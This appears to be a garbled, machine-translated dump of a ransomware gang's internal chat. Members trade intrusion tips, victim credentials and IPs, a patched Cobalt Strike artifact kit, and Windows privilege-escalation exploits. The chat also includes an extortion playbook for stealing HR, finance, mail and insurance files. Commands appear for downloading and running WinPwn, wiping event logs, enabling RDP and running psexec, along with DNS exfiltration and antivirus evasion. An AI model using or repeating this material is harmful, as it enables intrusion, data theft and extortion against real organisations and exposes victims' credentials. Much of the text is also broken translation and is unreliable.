Do not work direct-message, ie person writing in direct, he sees the notebook, but when you open the message is not, too, I'm interested in settings where and what to prescribe a servak And this is from the corporation picked up, often found such charts, format `.vsdx` and opened through VISIO Hey, and you yourself draw a diagram or is there any program? who is online urgently!acunetix have you got a working one? sorry guys)understood on the "whole forest" it will only go with the wrong settings for the active directory for which you generatebecause it contains a specific domain sidgolden ticket works only in your domain's neprelekh can someone advise on kerberos::golden created taqet, how now to connect them to the trust host? i will also take a) but later tonight will be) +1there is an urgent need to work@all have hands free? access flew fresh try to remove the backslash from the login, it escapes from this amputation ``` FC944FD5-6FA6-491F-B3AE-055AA04B8DE8 CASTCORP\Veeam_Admin AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAAB44Kw95xZkO6FxCbmQL9XgQAAAACAAAAAAAQZgAAAAEAACAAAAB/fgYimujV08FFVF1HorEMrAbTeP2+007aEVdbUJiq4AAAAAAOgAAAAAIAACAAAAD2X4IEl9UCIkgoq8dV54rX4hc68kJixNPGsZ7ED/SOnSAAAAA7Qhz+33PcMmQaeTlpX8v8TbVrJ4fiHKETkUapmrm3o0AAAADfmyWgvy7k7xVlID5kiZ099vxskNC1MrgIsxxzHeZpSLfA4C/1Sem886hEIuJ5cai/6wRJ/1NzB1A9iBxEP380 21857372 2015-11 Veeam_Admin 1 2020-07-29 15:26:43.573 ``` I leave only ``` Decrypt("CASTCORP\Veeam_Admin. AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAAB44Kw95xZkO6FxCbmQL9XgQAAAACAAAAAAAQZgAAAAEAACAAAAB/fgYimujV08FFVF1HorEMrAbTeP2+007aEVdbUJiq4AAAAAAOgAAAAAIAACAAAAD2X4IEl9UCIkgoq8dV54rX4hc68kJixNPGsZ7ED/SOnSAAAAA7Qhz+33PcMmQaeTlpX8v8TbVrJ4fiHKETkUapmrm3o0AAAADfmyWgvy7k7xVlID5kiZ099vxskNC1MrgIsxxzHeZpSLfA4C/1Sem886hEIuJ5cai/6wRJ/1NzB1A9iBxEP380="); why is csc.exe veeam.cs not working? 
sql manament let's try either raise cobalt session and style token sklservsql manament studio poke the owner of your process "can't" in the subdialog from the context of the untrusted processwho had such an error when decrypting viam ? ``` Msg 916, Level 14, State 1, Server FRVEEAM02\VEEAMSQL2016, Line 1 The server principal "CASTCORP\CASTCJA" is unable to access the database "VeeamBackup" under the current security context. Ookchutka late) off already Citrix) will be tomorrow) well, let's take it - see what there may be and rdp there may be an opportunity to call citrix@alter there are cmd or rdp? @all there are willing to take citrixes to work thick? @all sicaf-cosmetiques.fr i don't see any confinaTransAm Trucking is not our case either? i'm learning it's a startSearch for servers through a domain controller, collect information on AD: users, computers, groupsSearch and sorting users, ipins, search for sharpshoot what? hi there. i've learned how to collect information on cob, call me when something comes up, i will help you. hi, what do you want me to do?hello therevi remember) hello. you write me, don't forget about me don't have anything myself would you like me to do something for the weekendGrimnirCodeocta0dayinbizChucknimbus2000 hello yourself almost without work you sit there hello, can you help me? you got anything for me? hi, we're long with the case if you have any questions - write me I'll clean up and update the top post later The regulations of the case and work with data : 1. When the lock is complete, we output the following information to the corresponding confab https://domain.com 100 Servers 1000 Workstations Mega: guerillamailaccount@sharklasers.com ComPl3xAndh3@vyP@s))91 200 GB (here we specify the amount of data in unzipped form, if it is not clear - mark it COMPRESSED) COMPANY NAME creates elite transgender sex dolls for the U.S. presidential administration. 2. 
After that in the near future we put to merge data from the mega and prepare in parallel Data-pack 3. Data-pack is delivered in the following form full-listing.txt - full listing of all files downloaded from mega 30percentlisting.txt - 30% of full-listing with special emphasis on HR/Finance folders/databases with private information datapack-example.zip - archive containing files from 30percentlisting.txt with priority on files containing confidential information, scans of documents, HR documents, closed projects of the company (the archive is small, weight 10-30 megabytes) 4. Insurance. In the process of data capture and in the process of their parsing, we are looking for files containing cyber-insurance conditions, standard search tags cyber policy insurance endorsement supplementary underwriting terms If such files with the contents of insurance conditions are found - MUST post them separately in the channel at the end of the case, they are an IMPORTANT subject of bargaining. The presence of files on the network indicating GDPR significantly increases the success of the payment, this is the standard which is adhered to in the storage of user data, for their leakage the company faces significant fines. Please pay attention to this abbreviation in the process of work and in the process of unloading the file listing and indicate it in the report submission. 5. What data you should pay special attention to Databases containing information such as: email addresses / names / addresses / payment cards / DOB / SSN / Drivers License (all such databases must be exported and samples of records from these databases are contained in the Data-pack). 
Files and databases related to company employees (they almost always contain private information similar to the one described above) The contents of mail servers (the correspondence is a very strong factor of pressure, unloading of the contents of mail boxes of the administrative level is IMPORTANT, if such is unloaded - it is necessary to mention it separately with a name list of employees and their positions, whose mail archives are unloaded) Contents of folders Accounting/Finance/HR/Projects/Confidential Sources of software, if any, developed in the company 6. The data from the mega must be downloaded in its entirety to a dedicated server ``Thank you Redbox, it's blocking via iptables``. something else needs to be done to make it possible to do all the traffic ``` iptables? : - )@lexman might be useful ``` https://github.com/darkk/redsocks https://habr.com/en/post/116360/ I got it, thanks, I need something else which will allow to wrap all traffic, instead of a separate progodko about all traffic I do not know, if to wrap in torghost, there is torghost https://github.com/GitHackTools/TorghostNG You need proxychainz to start your own programs through proxychainz and run them through the terminal: proxychains4 software_name ..atributes github: ``` https://github.com/rofl0r/proxychains-ng ``` guide installation ``` https://en.kali.tools/?p=290 How do you wrap all the traffic to a sox/tunnel in it? proxychains4 (proxychains-ng) Hi all. 
Can you suggest a Proxifier analogue for linux I added virtualbox but hoonix can not connect to tor network if not give brandmauer permission on all outgoing connections common profile, I tried to include all rules manually added to brandmauer, all the bases of the network, prescribed ports 9002 and 9030, and still no connection without a common permit I want to prohibit in the firewall all outgoing connections except virtualbox and chrome, so that no one program can not send a single byte https://www.whonix.org/wiki/Other_Operating_Systems Explain what the problem is (are there any hoonix experts?) I can't set up the right firewall rule for hoonix to connect to the network with connections disabled without rules. I've added virtualbox in permissions and enabled all existing rules, explicitly allowed ports 9001 and 9030, but without allowing all outgoing connections for the general profile - doesn't want to connect! Can anyone know what to add to the rules that this stuff would work quite interesting but if no msf - yes ...you already have an encrypted stepping channel open )ntds you can unload and metasplotom )ntds some unload for example) hey, I think when you need to leak a little and no password, this tool can help traffic can be filmed on iplus dns is the default open protocol, it is not encrypted the speed is interesting)it is a fucked up thing most likely)test the speed on the nix, python is only needed can be useful as a substitute for the rclon, and on servers where there is no internet, but the external addresses on the dns are resolved https://darkbyte.net/exfiltrando-informacion-por-dns-con-invoke-dnsteal/ manualhttp://github.com/JoelGMSec/Invoke-DNSteal the analogue of Rclone implemented through dns transport If so, we'll write ToR to coders, and they will try to finalize it and test it on small networks if anything does not work - write to me or directly here, we'll figure it outPrecious I do not remember the numbers, but in this build all the useful 
kernelexploits -> MS15-077 - (XP/Vista/Win7/Win8/2000/2003/2008/2012) x86 only! MS16-032 - (2008/7/8/10/2012)! MS16-135 - (WS2k16 only)! CVE-2018-8120 - May 2018, Windows 7 SP1/2008 SP2,2008 R2 SP1! CVE-2019-0841 - April 2019! CVE-2019-1069 - Polarbear Hardlink, Credentials needed - June 2019! CVE-2019-1129/1130 - Race Condition, multiples cores needed - July 2019! CVE-2019-1215 - September 2019 - x64 only! CVE-2020-0638 - February 2020 - x64 only! CVE-2020-0796 - SMBGhost CVE-2020-0787 - March 2020 - all windows versions CVE-2021-34527 - July 2021 - PrintNightmare Juicy-Potato Exploit itm4ns Printspoofer ``https://github.com/S3cur3Th1sSh1t/WinPwn I got you. small nets a couple of times in a week out of 5okay. I need statistics (roughly, of course), how often zerologon works, for example, if you see that on the ms17 all zatchedoklejka thinga specifically rce / lpe 2020 and 21 years old does anyone in the work use any slots besides ms17? https://github.The registry, I can send you the script when you have 100 machines, it's already a pain in the ass, I also had to remove it through the registry and then reboot the registry it will not let you locate 1 machine usually can be found without an averter, but through -p \\drygoj_host\c$ does not allow to locatefosos need to remove the handpoint? have the rights of the admin? or an overwriting algorithm in the filemaybe it redmi panes and does not allow to damat good to zadebat what sofos not like massa he will tear it down?signature? a few thousand dollars? on the exploit saw that there is a utility that brings down sofos, but you need to sign the driver, and this is also a kind of gemmornuzhdenu debug sofos found a way to bypass the bypass? 
whether or what else it stalls, it does not allow you to screw in the screws with panda also acerttnoe on the automated data drain, but as far as I know it still in the planahalter like ordered some softbro here one way all rests in the human factor and the administrator, his laziness. You can drain 1tb and no one will get off his ass, but you can spill your guts in 10 minutes so there are pros and cons everywhere, but it's better to download through rdp + geolocation too that all this would be automatedNu need to create a cluster of servers through the laying will be normal or write a custom client and pump out somewhere-by the way, the solution - to pump somewhere on the dedic- that plilinu by the way about the mega - that it will banish accounts on any sneeze is expected, It is possible that sooner or later we will come to the fact that it will be impossible to use it at all, as a complaint) can - but banned actors with info - undesirableAA https://mega.nz/cmd has anyone tried? as a matter of fact it is possible to give commands via kobuzachem it nadprosto can nu ne rigidno)well if you understand it all you probably also understand that there is no ideal way)i saw solutions to limit traffic, like even through the client mega can do to "smear" evenlynos 2 to 4 am will be peak traffic, then quiet any admin will add 2 +2, and it's no problem to look who and where was leaked from if you leak 100+ gb of traffic at night. imagine how it would look in network admin systems? 
there the main idea is to camouflage yourself as legitimate traffic backpack to sftp, pack it in a password protected archive and upload it somewhere on fileshare the best way I do not know better but at a breakage will need to download the connection is not secured by sftp on port 22) well you can put ssl almost all takes on the networka dlp quite a serious thing-plus comrades suggest that if the fftp connection will break the download will be interrupted and everything will have to be unloaded again I do not know which of these is more paleTo make a fundamental difference, you need to open the upload server inside the network (or better to use the existing one) and take the outside dateFor starters, pack the entire date with a password archive, then the system type DLP will not be able to peek and see what you're pumping there, you will see just a big chunk of traffic and all the same traffic goes out to the left domain, whether the domain mega or some otherprincipal difference between the two methods you gave no not so easy all pumped a little, but with the admin wheelbarrow, perhaps more simantickakoy AV ?the idea is that admins can fire on the network traffic, if you downloaded a lot and loaded the channel and could burn, but it's not exactly us can fire, when the balls go from Yes? The situation is as follows, the session is dead and the host is pinging Only I accessed balloons and downloaded files from it, no other actions But not all files downloaded, there was such an error: [*] started downloading of \\123\\c$\Users\123.pdf (512611 bytes) [-] download of 123.pdf closed. 
[Incomplete]write @steven or @hearda suggest cryptocurrencies pailoadconnects stores in logs C:\Program Files\Fortinet\FortiClient\logs thanks to memory only+connect profile from appdata usually helps with chrome to yank all passages they are tied to ldap as a ruleHi can you tell me please where FortiClient (fortik vpn) stores the credentials?alex and i'll give you the net now everything is ok nowwoi everything should be ok now re-login i'm not, i have to bother to read your messages maybe i have not enough rights to email you? yeah ok give me the full composition of hell from here guys, from viam i got these creeds login:pass, who can tell me what is it?) ``` 8a29ab8d-d896-4e37-a68e-159f49309c4d : 9ecc8be6-38a2-4c48-8c54-147487d9b036 a9b16cb3-2da2-487d-ac15-78fb84432381 : 04d075dc-c459-4607-97e8-d513efb5abeb ``understood ... )anyways sessions re-shoot the kobyd does not matter which one I did not mean it) I have 4.2 kobyd did not download) hello, have you anything to do? or all already downloaded? it does not re-shoottut what? moved? if so - add to the groupI did not even look, but it probably makes sense to look Anybody downloaded the manuals that leaked on the XSS forum? Is there anything useful???? aha, ok, what can you think of? I've already tried a million variations and still nothing comes outThough by web domain babelendu some removed house bluepathfinance with domain goodvibsi removed they type "5baftI06a0yitk0SBmQh4T1mip01shZTHVdUPyxDYN0= 1 jkinnen Fordo55! 
goodvibes" although they are exactly right because they were taken off the same ones the second one will not be correctesonik through extender or the web does not want to take passwordswithout an opinion I'll do it when I come backwrite just a list of ip addresses where you need to rewrite it ok take it off the day after tomorrow i wrote a list of ipaks 3 hours ago)damn late)@alter this one needs to be reshotasdf7f814vycfasUPDATE: added new patterns for stageless loads@all IMPORTANT ARTIFACT KIT UPDATE Everyone download the archive and replace the files in the "over" folder, all files! The current version of cobalt is patched with a Java hook where the EICAR trial print is removed. Requires jdk13 on vinda to run : Add this to the batcnik @echo off pushd %~dp0 set PATH="C:\Program Files\Java\jdk-13.0.2\bin\" To run on Ubuntu : startup string java -XX:ParallelGCThreads=4 -XX:+AggressiveHeap -XX:+UseParallelGC -Xms512M -Xmx1024M -javaagent:hook.jar -jar cobaltstrike.jar $* installing the right Java : sudo add-apt-repository ppa:linuxuprising/java sudo apt install oracle-java15-installer java -version java version "15.0.1" 2020-10-20 Java(TM) SE Runtime Environment (build 15.0.1+9-18) Java HotSpot(TM) 64-Bit Server VM (build 15.0.1+9-18, mixed mode, sharing) For those who have Kali (Debian) : https://www.linuxuprising.com/2020/09/how-to-install-oracle-java-15-on-ubuntu.html There will be a section below Install Oracle Java 15 on Ubuntu, Debian, Linux Mint, Pop!_OS, Zorin OS and others using an APT PPA repository Included in the package in the folder Cobalt42_v2/Toolkits/artifact/brooks-artifact-kit/ is artifact.cna, which must be imported into cobalt to generate internal native loads and staged loads to run. 
At the moment the situation with the detects is as follows : https://dyncheck.com/scan/id/eeab696158db737d90da83a0ebf7bc53 - dll x64 https://dyncheck.com/scan/id/f656a34930eb682d6cab252798234f7c - service-exe-x64 https://dyncheck.com/scan/id/32c29f3ba498be4915bb72d4bae824ce - staged payload x64 All of these loads are used not only to manually run the files, but also to jump functionality. Enjoy, give feedback, wait for updates and patch notes. Thank you all. Artifact Kit is used in the following cases : * Attacks -> Packages -> Windows Executable * Attacks -> Packages -> Windows Executable (S) * Attacks -> Web Drive-by -> Scripted Web Delivery (bitsadmin and exe) * Beacon's 'elevate svc-exe' command * Beacon's 'jump psexec' and 'jump psexec64' commands ``yeah ok, I'll get it right away@stakan take it for yourself right away``anyone has archives/listings ready for upload from the ones I asked yesterday? wow good how it's done in a minute``? Make a listing of all files in a particular archive without unpacking: 7za.exe l "Shared_BUSwine.7z" >> listing12.txt Make a listing of all files of all archives in the folder without unpacking: 7za.exe l *.7z >> listing14.txt ``Isn't it clear that botnet broke startup, fix it, 30-40 minutes and it will work freshfat32https://blog.sitedd.ru/archives/53 manual for megatools error not fixed, but started downloading) constantly flies out the error ERROR: Can't login to mega.nz: API call 'us' failed: Server returned error EEXPIRED despite the fact that I left the browser more than 10 hours agoanyone used the mega console client megatools? 
you need advice i will get up and at 7:30 am Moscow time i will be there at 7:30 pm pm pm pm gentlemen sleep well tomorrow you have three nets under the lock and av to sort out on the end look for files only to download and locate something to do in the morning = )Do not type in the background i already told you - there will be no problems with the tasks in the near future you have something to do, do not you? bournesenergy.com 86kk ``` with yes rights, who? who's free? tell me whose server was it? 172.93.105.2 ``A VERY handy subdomain searchhttp://raw.githubusercontent.com/Fadavvi/Sub-Drill/master/Sub-Drill.ѕh guys can somebody give me a shodan account? fuck yourAuoffline_winpwn.ps1 for machines without internet access, use the commands from the manual after importing ``Import-Module .\WinPwn.ps1 ``` or ``iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/WinPwn.ps1') ``botch) just don't understand any errors or results all does) what does it do except do nothing?) :innocent:base where the creds are stored, holy of holies) Security Account Manage data@all @altertert what is SAM data? https://github.com/S3cur3Th1sSh1t/WinPwn @all a very solid psh script, there is a nointeractive mod to work with cobalthttp://github.com/GossiTheDog/HiveNightmare@all in testingwho has a guide to how to armitge dedicate?@all working version of BOF compatible with styler, inside there is readme.txt file for review@general please all who use our BOF injector to inject locker into memory write down where it is blocked now for further testing i will upgrade to a better version to bypass the bypass avr in what could be the problem? 
the listener is prescribed correctly, the port on the server is not busy works on any windows machine super, this is what you need) yes, you need it) and will it work on the admin station? then any authorization by cmb or rdp in lsass will his cleartext pass if he leaves the server, i will put there and wait until he comes back on, ok?but the bonus is you need to unlogin admin domain or reboot the server if you have a context domain admin can stick through remote register, wdigest key should stick, google guys, you need to steal the password of an admin at the time of entering his password when authorizing on the server, I have a 1 YES, need here go to the server and make the next time the admin came to the server and enter it creds - I got clipass, realistic in general?``reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f `` Hi guys, could you please tell me how to deal with this... I'm trying to use port 3389 remotely. At the execution of the second command writes such a tip) `` `` C:\Users\Administrator>PSEXEC.EXE \192.168.3.100 -u glocap.com\chin -p Gustav1! -s CMD PsExec v2.32 - Execute processes remotely Copyright (C) 2001-2021 Mark Russinovich Sysinternals - www.sysinternals.com Microsoft Windows [Version 6.3.9600] (c) 2013 Microsoft Corporation. All rights reserved. C:{Windows\system32>reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Serv er" /v fDenyTSConnections /t REG_DWORD /d 0 /f netsh advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localpo rt=3389 action=allowThe operation completed successfully. C:{Windows\system32>reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control \Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f A specified value is not valid. Usage: add rule name= dir=in|out action=allow|block|bypass [program=] [service=|any] [description=] [enable=yes|no (default=yes) [profile=public|private|domain|any[,.] 
[localip=any|||||] [remoteip=any|localsubnet|dns|dhcp|wins|defaultgateway| ||||] [localport=0-65535|[,...]|RPC|RPC-EPMap|IPHTTPS|any (default=any)] [remoteport=0-65535|[,...]|any (default=any)] [protocol=0-255|icmpv4|icmpv6|icmpv4:type,code|icmpv6:type,code| tcp|udp|any (default=any)] [interfacetype=wireless|lan|ras|any] [rmtcomputergrp=] [rmtusrgrp=] [edge=yes|deferapp|deferuser|no (default=no) [security=authenticate|authenc|authdynenc|authnoencap|notrequired (default=notrequired)] Remarks: - Add a new inbound or outbound rule to the firewall policy. - The rule name should be unique and cannot be "all". - If a remote computer or user group is specified, security must be authenticate, authenc, authdynenc, or authnoencap. - Setting security to authdynenc allows systems to dynamically negotiate the use of encryption for traffic that matches a given Windows Firewall rule. Encryption is negotiated based on existing connection security rule properties. This option enables the ability of a machine to accept the first TCP or UDP packet of an inbound IPsec connection as long as it is secured, but not encrypted, using IPsec. Once the first packet is processed, the server will re-negotiate the connection and upgrade it so that all subsequent communications are fully encrypted. - If action=bypass, the remote computer group must be specified when dir=in. - If service=any, the rule applies only to services. - The ICMP type or code can be "any". - Edge can only be specified for inbound rules. - AuthEnc and authnoencap cannot be used together. - Authdynenc is valid only when dir=in. - When authnoencap is set, the security=authenticate option becomes an optional parameter. 
Examples: Add an inbound rule with no encapsulation security for browser.exe: netsh advfirewall firewall add rule name="allow browser" dir=in program="c:\programfiles\browser\browser.exe" security=authnoencap action=allow Add an outbound rule for port 80: netsh advfirewall firewall add rule name="allow80" protocol=TCP dir=out localport=80 action=block Add an inbound rule requiring security and encryption for TCP port 80 traffic: netsh advfirewall firewall add rule name="Require Encryption for Inbound TCP/80 traffic" protocol=TCP dir=in localport=80 security=authdynenc action=allow Add an inbound rule for browser.exe and require security netsh advfirewall firewall add rule name="allow browser" dir=in program="c:\program files\browser\browser.exe" security=authenticate action=allow Add an authenticated firewall bypass rule for group acmedomain\scanners identified by an SDDL string: netsh advfirewall firewall add rule name="allow scanners" dir=in rmtcomputergrp= action=bypass security=authenticate Add an outbound allow rule for local ports 5000-5010 for udp- Add rule name="Allow port range" dir=out protocol=udp localport=5000-5010 action=allow C:\Windows\system32> ``not for bots it's more for your workstations cleaning if you have it, all logs leak there and you can't clean them that way if not, then the logs are stored literally a couple of days, after loca forenziki more likely to pick up the logs of network equipment, and not the winnings clearing winnings logs absolutely useless exercise@all have a file on msf tcp_rc4 listener? clean of course)4 @atombatnik for cleaning logs can also do so ``for /F "tokens=*" %%1 in ('wevtutil.exe el') DO wevtutil.exe cl "%%1" `````` Cleaning Logs 1 Run the PowerShell console with administrator privileges and use the following command to list all the classic event logs available on the system with their maximum size and the number of events in them. 
Get-EventLog -LogName * 2 To clear all event logs, we would have to redirect the log names to the pipeline, but unfortunately this is not allowed. So we have to use the ForEach loop: Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log } 3 For the event handling in Windows there is a powerful command line utility WevtUtil.exe available for quite some time. To display a list of logs registered in the system, run the command: WevtUtil enum-logs Clearing events in a particular log is done as follows: WevtUtil cl Setup Before clearing, you can back up the events in the logbook by saving them to a file: WevtUtil cl Setup /bu:SetupLog_Bak.evtx To clear all logs at once, you can use the Powershell commandlet Get-WinEvent to get all the log objects and Wevtutil.exe to clear them: Get-WinEvent -ListLog * -Force | % { Wevtutil.exe cl $_.LogName } or like this Wevtutil el | ForEach { wevtutil cl "$_"} 4 Log clearing can also be done from the classic command line: for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1" Log Cleaner Batnick PHP: break>"%CD%\server_log.txt" break>"%CD%\logs\errors.log" break>"%CD%\logs\log-core.log" break>"%CD%\logs\warnings.log" break>"%CD%\logs\plugins\mysql.log" Clear all Windows Event Viewer logs 1. CMD for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1" 2. powerShell Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log } ``okhwaiting for you there? Finally, everything is working fine Somebody already had this problem, I wrote to steven, maybe he can fix it Maybe I do not have enough rights to email? Well, if there will be a grid, we will dodost to cobalt no rights raised, no one has not shown anything yet raised rights?and what have you done? job on the cobait I found a bug, how to open the PM messages if they are not read (in the rocket), if anyone has such a problem in the future, please contact:) I would like to get a job, on the cobalt to workprivet. 
Eliminated the problem, tell me what to do, what I need to do, maybe some manuals, or to train on what can be? i have no idea what to do. i must try all possible options :) i do not know how to help i did not have this problem notification skips in the bottom corner and have time to read, but in the chat is displayed as unread and i can not open it, i can not open new messages, and older only open on the bug, i do not know what the hell, maybe i need to update something.. zto what he wrote before opened, the last two messages are hanging)) you just need the messages?Hi, I need to try the settings, messages are not readenenHi, checking connections, write something, two days we fuckin' do not understand what the problem is :) I'll try to figure it out, write it down I have no problems honestly chzvitsya as unread, but can not see you zhmoi read did not understand) hi, first need to figure out why I do not see messages in personal chat, only notifications fly through quicklywhich you need to teach?Hi, I'm all ready to go! restoring my computer after cleaning and formatting softswitch and otpisheponya, I will storm him) well it's okay, already wrote, silent popeishish steve if they did not give anything did not give him yet? hello + any other ideas? ootlok during working hours people don't sit on their work computers. they seem to get fucked up about it... everyone uses smart phones... well except for work email... but it all depends on the office... ups, dhl, royalmail++ are good options add more, don't be shy )) newsmagazine users from the networks (work computers) @lexman @all tell me exactly what users Facebook, google, youtube, tiktok, netflix@all gentlemen pentesters, what sites or topics (not related to work) most often visited by corporate english speaking users? and immediately a question - and what does the girl with the daughter have to do with it? 
the girl is a backup or something ahahahh i saw a congratulation from kaspersky labs somewhere today girl with daughter walking through the woods and wrote "all administrators happy bekap day!"amen)congratulations to all with bekap day :smile:npa, I see spstut lies, do a search on the conference files or tell me where it lieswho has a sonic session checker compiled in the ehe? there is a fresh casehas to find an old granny with a vegetable garden) Yes pomoyu at myself, but not sure, I personally use vmku debian crypto + elektrum via tor proxy, cid phrase buried at the granny in the gardenPlease advise on bitcoin storage not store bitcoin at all? the best option is a clean OS and electrum with backups ? Aparthot wallet sounds cool, but if there comes an abuzz, you can stay without money - is that correct? Rewrite it on Windows >Collecting all kinds of manuals there who to add chat in the personal - will add#all_manualsPlay somewhere flashed man how to find the right process for all servers in the domain in particular sqlservr , can duplicate pliz in Ls@all write to the confab where appropriate sessions will passedvshe Hi, how do you solve the unloading of mailboxes if the mail server is not enough space? Who met with UrBackup? How do I determine where the backups go? In the folder looked around, the only thing I found, hints of linux.In the current case is such a thing, on the fs more than a million directories, all in French and German, to sort it out by hand quest unreal. That's why I first started using the software WizTree, to create statistics of directories and filetypes, and now bypassing fucking crap, we pack the necessary files, for example, this command archives all pdf with X 7z a -tzip Y:\pdf.7z -ir!X:\*.pdfI have this idea - you can use as an alternative to rclone Search by file mask excluding mp3 wav exe dll sys etc. + by date, pop up on the left menu and upload to sftp... 
http://seo-ng.net/seo-statiy/more/poisk-v-total-commander.html@all are there anyone without cases? https://askubuntu.com/questions/648555/bash-program-cannot-execute-binary-file-exec-format-error You're trying to run an executable compiled for an ARM architecture on an x86-64 architecture, which is much like asking your processor who only speaks English to take directions in Chinese. seems to be compiled for ARM build, I tried to run it but nothing, I thought it was because of Java, I tried 3 versions, no way) no working software for a particular lin seems to be, or 32 bit compiled or I do not know)bash: ./check-sonik: cannot execute binary file: Exec format egorponjaloalo fresh new sessions nagaetaaa it to that information that goes with the case it needs freshwhich you have from the archive which is in the confine lies the path to the file sessions.jsona where to get how to use) " [path to sessions.json] you have to write in the above linemanual from Code, just follow the instructions on how to use chesk-sonik.zip Code March 16, 2021 5:58 PM ./check-sonik [site.com] [path to sessions.json] At the end will output sessions with cookie tokens ready, no need to do btoa, here's an example: User: jasmijn.maertens Password: Jmij310s455172 B64 token:MXJ4UHpXSXRGVVUxrRFV5a2U1aU1GRnNXZG5FZEVCSkVNMldJU3dWM2I4QT0=at least one, but this is the minimum call to support and dismantle all pk or where in my case was so, even after a complete shutdown inveigh'a tried responder -I ppp0 -rdw -v tried it both 1st and 2nddid not catch anything right now, ifconfig root@kali:/home/kali/Desktop# ifconfig eth0: flags=4163 mtu 1500 inet 10.0.2.15 netmask 255.255.255.0 broadcast 10.0.2.255 inet6 fe80::a00:27ff:fe5c:6526 prefixlen 64 scopeid 0x20 ether 08:00:27:5c:65:26 txqueuelen 1000 (Ethernet) RX packets 9064 bytes 6293746 (6.0 MiB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 6950 bytes 572052 (558.6 KiB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 lo: 
flags=73 mtu 65536 inet 127.0.0.1 netmask 255.0.0.0 inet6 ::1 prefixlen 128 scopeid 0x10 loop txqueuelen 1000 (Local Loopback) RX packets 40 bytes 2240 (2.1 KiB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 40 bytes 2240 (2.1 KiB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 ppp0: flags=4305 mtu 1280 inet 192.168.149.140 netmask 255.255.255.255 destination 192.0.2.1 ppp txqueuelen 3 (Point-to-Point Protocol) RX packets 6 bytes 98 (98.0 B) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 5 bytes 54 (54.0 B) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 root@kali:/home/kali/Desktop# responder -I ppp0 -rdwv __ .----.-----.-----.-----.-----.-----.--| |.-----.----. | | -|__ --| | | | || -| _| |__| |_____|_____| | ___|__|__|_____||_____|__| |__| NBT-NS, LLMNR & MDNS Responder 3.0.2.0 Author: Laurent Gaffie (laurent.gaffie@gmail.com) To kill this script hit CTRL-C [+] Poisoners: LLMNR [ON] NBT-NS [ON] DNS/MDNS [ON] [+] Servers: HTTP server [ON] HTTPS server [ON] WPAD proxy [ON] Auth proxy [OFF] SMB server [ON] Kerberos server [ON] SQL server [ON] FTP server [ON] IMAP server [ON] POP3 server [ON] SMTP server [ON] DNS server [ON] LDAP server [ON] RDP server [ON] [+] HTTP Options: Always serving EXE [OFF] Serving EXE [OFF] Serving HTML [OFF] Upstream Proxy [OFF] [+] Poisoning Options: Analyze Mode [OFF] Force WPAD auth [OFF] Force Basic Auth [OFF] Force LM downgrade [OFF] Fingerprint hosts [OFF] [+] Generic Options: Responder NIC [ppp0] Responder IP [192.168.149.140] Challenge set [random] Don't Respond To Names ['ISATAP'] [+] Listening for events... and it's not catching anything. on the VPN interface, right? ppp0: flags=4305 mtu 1280 inet 192.168.149.140 netmask 255.255.255.255 destination 192.0.2.1 start like this responder -I ppp0 -rdwv what conditions? 
axis, interfaces on the virtual machine you get two local ranges probably and invei/responder works on the "first" local one guys, responder inveih, on the virtual box does not work but on the grandfather connected to the grid does, why does not work on the virtual machine connected to the grid?all got it, there artifact work koba someone did stage cna for bacon? @all who needs in the next hour and a half to redo the session - throw ipaks in the appropriate configurations who already did that? ``` https://github.com/p3nt4/Invoke-SocksProxy https://github.com/tokyoneon/Invoke-SocksProxy/ ``OK, thanks@steven ask himHello, who can decrypt the hash? ```BC98FFCB81EC7BC81C7C8BAE6292BCBE``` I can't get cmd5 and I need the passkey. Or maybe another service in mind? Who has an account on Zoom info, share plzPisplayed in PM.@all guys who viams decrypted, in pm plz, a couple of questions have@Air poured the date here pour into the generalinsulation.com folder and let me know how it's done ``` 172.82.162.66 admin 3cT26dDrDCwS ftp 21 port ``@Air give me hell here, thank you, I will put you in the group hello, alter asked to write off who is available to teammates, I do not do anything yet konkretnymesheskikh servoki localyya ekshi build vzhelemGod, who ``ESXi` servoki `nix` version local, knock in the personal, please.alex hasn't been heard since friday, gone somewhere, i have been watching him not always, but he is cheating almost alwaysHi Does the Kaspersky dll injector work? Or does it work ? give details in a personal if there is a YES - we can finish upgmer once killed him, but only in 1 network worked, apparently was badly configured, but the admin palil after thatPareni! against Cylance edr is meaningful to fight?i can't see it in the new rocket1 minszczady i'll see it in the new rocket, i can't leak it without a "jump?" what's the problem with remote dumping lsaas? on the 24th of march? 
Who in our brute force team can help? salt hashes https://en.wikipedia.org/wiki/Salt_(cryptography), tomorrow i'll sit down to test something to change the injector cobalt slightly more advanced avs have been stinging for a long time but this is the first time I've seen defender scorch everything, good evening koba? [*] Manual DLL Inject - @tomcarver_ [+] host called home, sent: 219946 bytes [+] received output: EntryPoint found [+] received output: Injected. ``` with parameters -m local everything works great on the machine with the session (injector,massinjector)yes, near the corresponding .cna script before you had to put it in the cobalt diru tell me where to replace these boff files, where to put)? ah, ok))) and now they will work even better they workedwait, and if injectors worked?) just replace them and everything should start the only Bofy cna not changed? oh_o found@all Urgent update your BOF files injector, builds that are in work since monday this week with the old injector will NOT start and do not forget to reload do .cna script@all IMPORTANT ARTIFACT KIT UPDATE everyone download the archive and replace the files in the folder "over", all files! kkrinter@alter @prince addit kto know how to know what will be the size of the folder with the files for the last 2 years for example? that from the total mass of files to estimate the future size?I'll hook you up with alex and give you the net. now it's ok. everything should be ok. now just log in. i can't. i have to take the trouble to read your messages. maybe i don't have enough rights to write in private? i should see why i can't see your messages in private, but in groups all is 